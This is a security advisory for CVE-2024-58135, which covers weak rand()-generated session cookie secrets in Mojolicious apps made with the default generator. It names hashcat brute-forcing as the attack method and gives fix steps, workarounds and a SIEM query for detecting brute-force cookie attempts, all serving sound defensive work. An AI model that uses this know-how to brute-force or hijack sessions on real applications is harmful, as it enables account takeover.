CVE-2024-58135
📋 TL;DR
Mojolicious applications created with 'mojo generate app' from version 7.28 use weak HMAC session cookie secrets generated via Perl's insecure rand() function. This allows attackers to brute-force session keys, potentially hijacking user sessions. All Mojolicious applications created with the default generator in affected versions are vulnerable.
💻 Affected Systems
- Mojolicious
📦 What is this software?
Mojolicious by Mojolicious
⚠️ Risk & Real-World Impact
Worst Case
Attackers brute-force session secrets, hijack all user sessions, impersonate users, and potentially gain administrative access to the application.
Likely Case
Attackers compromise individual user sessions, leading to unauthorized access to user accounts and sensitive data.
If Mitigated
With strong custom secrets or patched versions, session integrity remains protected with minimal impact.
🎯 Exploit Status
Exploitation involves brute-forcing weak secrets, which is straightforward with tools like hashcat; no authentication required.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check Mojolicious repository for latest patched version
Vendor Advisory: https://github.com/mojolicious/mojo/pull/2200
Restart Required: Yes
Instructions:
1. Update Mojolicious to a patched version. 2. Regenerate session secrets in configuration files. 3. Restart the application server.
🔧 Temporary Workarounds
Manually Set Strong Session Secret
allReplace the weak secret in the application's configuration file with a cryptographically strong secret.
Edit config file (e.g., myapp.conf) and set 'secrets' to a strong random string, e.g., secrets => ['your_strong_secret_here']
🧯 If You Can't Patch
- Implement additional session validation mechanisms, such as IP binding or short session timeouts.
- Use a web application firewall (WAF) to detect and block brute-force attempts on session cookies.
🔍 How to Verify
Check if Vulnerable:
Check if the application was created with 'mojo generate app' in Mojolicious 7.28+ and uses the default generated secret in configuration.Check Version:
perl -MMojolicious -e 'print Mojolicious->VERSION'Verify Fix Applied:
Verify that the configuration file contains a strong, custom secret or that Mojolicious has been updated to a version with the fix.📡 Detection & Monitoring
Log Indicators:
- Unusual spikes in failed session validation attempts or repeated cookie submissions.
Network Indicators:
- High volume of requests to session-related endpoints with varying cookie values.
SIEM Query:
source="web_logs" AND (uri="/session" OR cookie="*mojolicious*") AND status=401|403 | stats count by src_ip🔗 References
- https://github.com/hashcat/hashcat/pull/4090
- https://github.com/mojolicious/mojo/pull/2200
- https://lists.debian.org/debian-perl/2025/05/msg00016.html
- https://lists.debian.org/debian-perl/2025/05/msg00017.html
- https://lists.debian.org/debian-perl/2025/05/msg00018.html
- https://metacpan.org/release/SRI/Mojolicious-7.28/source/lib/Mojolicious/Command/generate/app.pm#L220
- https://metacpan.org/release/SRI/Mojolicious-9.38/source/lib/Mojolicious/Command/Author/generate/app.pm#L202
- https://metacpan.org/release/SRI/Mojolicious-9.39/source/lib/Mojo/Util.pm#L181
- https://perldoc.perl.org/functions/rand
- https://security.metacpan.org/docs/guides/random-data-for-security.html
